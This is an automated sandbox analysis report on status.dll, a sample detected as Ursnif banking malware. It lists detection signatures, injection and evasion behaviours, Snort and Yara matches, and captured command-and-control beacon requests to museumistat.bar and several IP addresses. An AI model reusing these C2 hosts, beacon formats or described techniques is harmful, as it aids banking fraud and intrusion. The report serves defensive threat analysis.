Windows Analysis Report status.dll

Overview

General Information

Sample Name: status.dll
Analysis ID: 555803
MD5: 947fe47db34a2654fc7aa76ec2bebec0
SHA1: 6e2d76945861c48a2e4552d87583c1a70e6525a2
SHA256: 02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
Tags: exegoziitalyursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Maps a DLL or memory area into another process
Writes to foreign memory regions
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: status.dll ReversingLabs: Detection: 23%
Machine Learning detection for sample
Source: status.dll Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_017D4872
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_02D44872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_04AA4872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_00AC4872

Compliance:

barindex
Uses 32bit PE files
Source: status.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_03B08B0F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_03B10219
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_03B016BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_048E16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_048F0219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_048E8B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_059116BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_05918B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_05920219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_009A0219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_00998B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_009916BA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_03B08F03

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49748 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49756 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 62.173.145.37:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 62.173.145.37:80
Source: Traffic Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.3:49764 -> 62.173.149.135:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 62.173.149.135:80
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 19 Jan 2022 10:50:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmp String found in binary or memory: http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8
Source: regsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmp String found in binary or memory: http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb
Source: unknown DNS traffic detected: queries for: museumistat.bar
Source: global traffic HTTP traffic detected: GET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: museumistat.barConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
